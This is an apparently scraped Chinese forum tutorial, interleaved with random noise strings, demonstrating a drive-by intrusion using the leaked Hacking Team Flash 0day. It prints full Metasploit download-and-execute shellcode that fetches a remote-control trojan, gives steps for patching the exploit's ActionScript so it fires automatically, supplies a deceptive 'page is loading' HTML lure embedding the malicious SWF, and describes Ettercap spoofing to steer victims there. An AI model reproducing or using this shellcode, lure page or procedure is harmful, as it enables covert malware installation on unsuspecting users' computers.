|
- K7 z2 N4 i% r 三、flash 0day之手工代码修改制作下载者实例入侵演示
: N& |( u& r; V Y5 J
1 \5 }3 Y6 {* I* j. n8 J4 l y/ T2 S- ? z. e
利用到的工具:
# u5 F! `' z) x
3 h, X2 |. U0 s# h) J, y0 P( r7 G8 Z! m* q+ k: v( V( P4 A, w
Msf v# [, Q, l+ `# r, ?+ m, y Q3 a
6 |, _! m0 I( e! R- R# `& a" t* s: N# N+ {4 ]
Ettercap % ]2 V: k) c5 X* \& f# ~
% G U# |$ I5 E- g# g }$ O0 K" h: T
Adobe Flash CS6 % e$ ~5 D5 t# v2 c* s' s% ?: V1 P: w
% w4 B" x9 Y$ u- a
1 u% \5 w2 d6 n/ e# s6 I Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 8 U* w: s. S7 j5 J5 e4 e
" M' X6 m. M% s7 v
$ I+ q6 D: j8 W+ Z+ i9 B% J8 t 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options 4 u# a" r; `, ?4 X4 U
4 f/ Q' H) F$ J
8 o( J8 t9 [& W K: L- l, ?- ~ 如图:
9 B2 {5 R" {6 L+ l: U: ]; S ) E- s' ~: O. C
/ S$ D t; X0 c q
) J( Q1 y" a2 M% I4 R . C) H& f( j0 c- b: o- G
" Q' z/ i6 w! L
( ?/ i# R1 S! z+ ^
/ v5 Y3 `" m2 Q& ]9 u8 \- R
+ A, F' v$ a r. l. q0 U, \, V& I
然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: 9 y( q5 s$ [$ T$ Z( n
$ s9 p3 s0 N5 d' t4 H% x
; Y/ s3 P( Z' q0 O1 C7 o
8 p# S2 y5 j% P: | - X O1 }+ S% w1 U# V/ m
" P7 f; S d) S4 w7 \: n
* H% j7 B4 M3 P. ]
; t0 o+ d8 @) e) k Y0 V5 {3 @, l1 q
/ _ t+ a7 U1 I4 u. f9 |5 _/ R 然后执行generate -t dword生成shellcode,如下:
* r& a4 f+ N2 e# B6 ]5 A
# ^4 D3 E! q+ g' r) ~% ~ h$ ^
8 k- q* [; u) x A; ~
$ P+ @2 m T2 l; l6 T+ E/ N3 Y 1 T6 W7 O& Y7 q$ Z5 Z
4 x, n9 n {, {! _. a. ? 复制代码到文本下便于我们一会编辑flash exp,如下:
3 ]( U8 e. p3 z1 ]' |7 T' f+ F + v8 ~9 Y) q3 S; I) ]; ~$ I
: X; o/ Z" P) z 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31,
. O" V% a/ F+ G d2 E; _( t$ P, e
6 u3 }! w1 l: X" H; C4 H8 P
6 u, Q8 g" d: W) Z% w1 V8 h8 r 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0,
) U+ q. O' V) _, f6 Z6 ]" h
* B- O' F) p. {' j* S, h7 P* d7 F7 J8 N4 g
0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, 8 w. d5 { p& [' E+ l7 s" J2 h
0 l' n$ T' X/ i3 n4 ]2 i3 K
( |' t+ G$ \9 W) d; k! a 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, 1 B, |* f" f( b+ V0 o7 k" U. q
5 Y8 E* V" d7 W7 B. T' ~; o; N" r( V
0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, ( ^9 \7 K$ S; ]6 y
: c& h$ e( u# i7 ^' c, H+ M9 }3 c) B" O, O% J6 N1 P) J8 `4 r
0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51,
( b1 k. n& l- A7 m$ k
$ a8 l! n# b- g+ h- Q6 {3 ?; U8 `, P$ Y7 \4 b' A" g! I' `
0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e,
: `. \" L6 g& [6 A0 \ # B2 D0 o9 x" H! A
& {" v3 j4 r! Z0 b
0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757,
: z9 u* ?, P4 M( ~9 P
- Q. a6 j5 [6 J. c' S1 e- M5 J8 h4 |. L; z3 H7 T# I
0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff,
. H' O# _" O! s: W' f$ {+ w# I; t1 s2 }
1 `9 {) L! M* x% f- F! n# k4 Q7 f$ ^, D- }1 M1 o" F
0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6,
! d8 q9 v, H' v) X% l' m5 U! {
% s4 A6 x& z: _$ h6 m `
% @* F8 ~/ e' a9 ~( c 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, ! Z" H9 L* R t1 M3 i
1 K4 L7 j, @, f0 k. K5 G5 M/ W0 Q
e- V8 P' S. Y) o
0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, " u2 u* A+ u* D9 n
$ Y% V/ S' ~5 Q j u
( r) v5 \: `6 t" e( W 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, , L7 l1 Z2 H& q9 R( J8 @/ L! E
4 @' n/ W6 N' G4 G* t
( \. N( @7 |$ l! E8 |0 [
0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 7 [2 f4 z% R) b' j7 _3 _
; B0 N2 R# ]8 y/ Y- |% t' P- B( B/ R$ p8 l/ R/ z5 N0 O
. y7 Q2 \1 }# @ ' R+ X1 H: x& o, c0 g- c
+ Q9 Z: ], ~5 T2 { B0 }5 C + n* o2 R2 f% E! [6 _9 \
3 C% x9 W* z, R0 a+ o# ?& z! u/ B& A; G2 M! M
下面我们来修改flash 0day exp,需要修改三个文件,分别为:
7 z* \" C( u5 W# o& u6 e2 C4 T
+ V! p8 @$ I# H( {1 v0 X- |
: }+ r6 ?0 _+ ?% u2 ` " m, Z0 b: J. |3 c
6 T: Y! e) r1 r3 R3 w. Q
( f) g1 Y- x9 Y0 r% c [0 I
先修改ShellWin32.as,部分源代码如图:
, @- O: }# t9 ]: `1 P- R $ X: d' F# w5 S. A' A
) V! \. ]# @* L9 q4 L7 i
a6 F( W4 l% w1 [# r7 j" ` h( q' W
' O8 u* c+ p. I7 X& P; t4 G0 U
; e& V8 v& P& A$ G& e 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下:
- R! C. \0 s1 O3 _; b! E/ U3 t 8 Q1 U6 s9 r4 F u! a1 Q3 c
0 {$ m0 U: k, U( \
) R' e3 e6 H% C. o, r 0 G1 A& Q$ j% _. @: ]4 Z( H/ j; k
* R# Q8 f+ y" ^* ] O 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: 1 a- G& r/ n' l/ D) m
N4 h- ~, M l6 K
S {7 E8 U6 w 7 t6 k+ g$ N( F, b9 U
# M4 q, M1 Z3 x$ A$ k/ ]4 g
* P! o8 G# Z/ b3 F/ t R 换行在后面加一句TryExpl();注意是l不是数字1,然后如图:
# [. z% ]$ w/ `2 ~: D+ d4 X
, W& {, O& c. M3 Z4 T" ], c/ W
9 i$ x& T4 [9 H: L4 }3 i
! E( H9 W2 ?2 @* r5 A" G3 C9 B3 R $ n! F& c9 `1 H+ X
% ^" C( j" T# u$ [8 N
% ]( D" u% x1 b r! i; V! u + o* k: v& U2 h; h8 \4 r! F
1 q; V* c7 i- L* y k) S- T8 E
( V7 f) ^; ?1 @ c) b* M
$ U4 r6 l2 X& d" W# n% C0 w& M; W7 t: S) |2 |. a+ h
然后点保存,下面我们来编译一下,打开
3 b& `3 g4 w4 I# J5 u
/ j% C0 Q8 B7 H+ y# l: t
1 Q- o8 c1 k* p; Q) Y0 E& O, U exp1.fla然后点文件-发布,看看编译没错误
* e- x9 u$ G. D8 ~4 `. b# M
& Y' k3 h8 N! J% v
+ ~: f4 |, n U1 v! t) S - P& `& C0 k. D# F5 j
% r6 T! m. u7 {# q3 U s
5 {+ V# T5 ~2 N3 A1 n5 w
3 i& N( P5 J/ O/ L% i+ ~! p
8 K) m; u7 ?9 a1 f5 k
( [+ u' D! @* C6 n# ^4 I' `
$ f, Z( C* H& e8 Z: W3 q F 8 w) @" Z2 E$ `7 l' R. e; [
8 q$ t- V% F# b3 M0 R3 c* F j$ Z! a$ j. }1 [/ D
0 J$ U3 ^3 e1 Y9 Z; f& y/ Y& b! D/ D0 ?7 i) x
然后我们把生成的
& E/ u7 {4 v' @' u" o
! |! P3 D1 f/ b) [' U) [% L2 M7 ^- T; l
exp1.swf丢到kailinux 的/var/www/html下:
1 Y7 o: f7 }) m! V# R1 W' o/ M
0 e2 u9 |6 d$ q% V y% u( o& A9 Q \
% u+ Y7 K" }9 |/ N 然后把这段代码好好编辑一下 ) X+ ~' H% C/ N6 M
/ `2 ?8 E) X! T7 M/ r4 x8 s! g& v( D4 w
7 r( w0 [# K9 c, A" O* l, Y ( ` d& ]) y0 x- D# |
* v N; ^5 ~5 o8 Y: n S
1 \, @ T% E- v. j$ N4 V* y
6 s; }) S4 {2 d, J C
$ p7 Z# j# t7 A! \. K$ D+ Y
7 n7 h- r+ b* J ; T2 U/ V3 {; B1 H
# A& F' h2 `. S. q1 z8 l: ]6 U+ b' y & E6 y/ y! m7 s
2 v/ ^6 ~9 V8 i$ Q3 f4 D0 w
9 ?* Q3 \3 K& l p
/ O n3 l9 g6 F4 V N; } g Y
S( F7 K$ T% @; C7 Y# D- m0 g
/ e& T; D2 z! A/ N% Y. `
; a$ x. U8 n2 q& u
/ U) a% |# H1 d5 P5 T6 l( K5 `0 b# r
7 v' R. ?0 [; l
<!DOCTYPE html>
4 ?( J0 o9 U: u+ n3 {1 D & d# E: y, S! ]6 i, @) J
/ ] {, G- G" S. u <html> - Z* i6 T+ g% d- s7 ?9 t
|+ C8 j4 T7 E
3 f# M" P- m; r2 g6 M% @* O& r
<head>
& x& W p p( N 7 s7 `% }: z8 W" k! T3 d
* \+ w( _, Y. C( C) J( K! e <meta http-equiv="Content-Type" content="text/html;
" T5 x: Y2 ?; _
+ ~: J% j) _7 ? g" |0 K, y) g% f5 M; L) U5 A0 S8 r: ?8 g
charset=utf-8"/> ' w; K1 \% ]) ~% l& ~
! s+ |* D( G" G O! S$ d# d: \( r* h( p d; p
</head> 0 R% E0 W4 R6 s4 y9 M4 i- F0 f
) h2 @' ]! W: A+ ?8 K$ Q6 e
1 ^1 x: f- \( t% l
<body>
( t8 k( o9 o* I2 i* e6 c, e( N % I. ?) c* t" y3 B s. {" }6 g
2 o" S! k* T2 ~5 {; R <h2> Please wait, the requested page is loading...</h2>
3 r% O7 l9 U: B% `' G ( Y' _0 O; }1 Q2 G
, k- w7 d$ O8 q5 I: @0 V. d! M <br> 8 p- \+ c0 M0 q2 M1 q7 E
( W& r( A; k j9 \6 u p) a
4 [- {: y( \/ n' e/ t( ? <OBJECT ; n! P) A1 _# S
' q4 K2 h3 _( {" `
2 a8 A1 A+ k' p H- E' s classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie . Q+ j0 G- i8 y) r; W3 G
6 o- {) u' V& S2 C, W- ~
( Q' T# u# L8 C& C VALUE="http://192.168.0.109/exp1.swf"></OBJECT> " G6 e6 s9 d9 }- |! F' I$ X
# s k1 q/ V6 D! c' K: M; Z" @3 H1 }
; h" V& r1 i ~% L </body>
2 ~5 [/ I( x0 I& u9 n1 J ; u+ j" y, o/ }8 e: _( C6 ]
& B8 T; {% Y% i <script>
/ ]# D. G( l" v! h9 ?, l " S, H ]/ g2 D8 a) r
* `! f6 t( u1 |4 v setTimeout(function () { " M' E6 a% S- _- l' Z
0 j) \3 V) ]: A$ y! c
. t& x/ Y1 ?; P
# z5 z0 E* D/ x# z; R. @& m6 l
3 G: N9 r3 K3 A2 ]2 {3 v! y
) d5 l0 u# u: m. D; c window.location.reload();
C& n6 F N3 h ?/ s0 a& }) V$ s
% B) l* e+ D/ B/ t: T3 n/ z
4 e3 v6 j+ r! Q$ S$ A }, 10000); 3 o) i( h2 n8 h3 `: }
7 N7 c' H3 |( \- a$ f. S
' u1 w% P" X# k& l) t
6 M$ G! [ [' z: @; i
* P0 y8 i( S4 A3 t# T+ f
3 Z5 ~; O% m5 i8 x: ]6 R </script> 3 {. l3 F+ E' {. c! O/ J5 d+ |
4 F6 X; ?6 }( ]: C& L$ e
! I0 g# c; S& }: J </html> 1 D' V: U: j1 H5 a8 ~ O6 g& i3 f
1 u& z* Z4 I. j! f; r+ m6 S! L" p( a4 F: b5 }. Z% Y
5 h. B9 L$ ]7 I- M
. M e+ H! ?: d/ z0 J. @5 k
9 B7 C% }8 e- |7 w' s- J
注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图:
, t- W/ V& h" V7 z7 r % M" h8 K; r, U
2 M7 d) @ i1 e+ ^6 V! q! r ) @, d- w5 S4 @/ C% S
4 {' I, M9 N( `
7 m7 ?, z% S# X+ `! ?
9 q0 k0 ]7 E. I( P* I
( s7 |: Q) q# ~
" ]7 I$ {) y3 |: T1 p3 \
- {6 `- E! a$ m/ }" V
* B% [1 \+ H9 S3 [* g3 w/ F4 u; T2 p1 K* z7 t1 w2 E) Q0 a
) w9 a& O& h; k! \* i' D - g' t9 x; _, D K& }
9 _% F" L+ D7 z" x) T+ |
: A/ x& q2 {$ i( |" G
6 X1 n e3 W) Z
" R6 g5 |, T% Y9 t! z1 p; D- e$ h 下面我们用ettercap欺骗如图: 9 }5 z+ V$ E% h- |; H/ d8 B
4 n% l, A( _+ E4 @2 C& G. S2 E# u
; v8 @ R. U) E; r3 ^7 U5 b# \ # U+ j1 \- b9 t# ]! J( J% M- T* d
& }% c$ N. p$ C$ ?
3 C; h& v. A: F' b1 u
% n3 ~( C: M9 H2 h& V
% d( p) ?# F3 v3 W" Z$ x) q1 W% R" |% i0 n' j
下面我们随便访问个网站看看:
9 A8 O& m# S7 Y+ V% j6 r+ f6 I 5 ] |1 H/ _, c4 `+ T: p% M
0 |0 ^3 C# N& r$ s9 y% v9 ^7 a2 S 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: # w4 P# _$ E2 I1 G6 V
- S9 z: e3 v7 ]* ^7 S H% n5 p q" u! }0 h# G* A
4 Q. h& U# r2 Z: x: o , A) N! Y& [4 m/ p
1 e- _6 d w8 b4 w
我们看另一台, 9 w2 C) p/ A6 ]5 s# @
; [, [- J' G' g% j! W1 l2 a
9 J9 i3 s. R; J9 C$ N 提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。 , L/ A" X( `% y0 |
|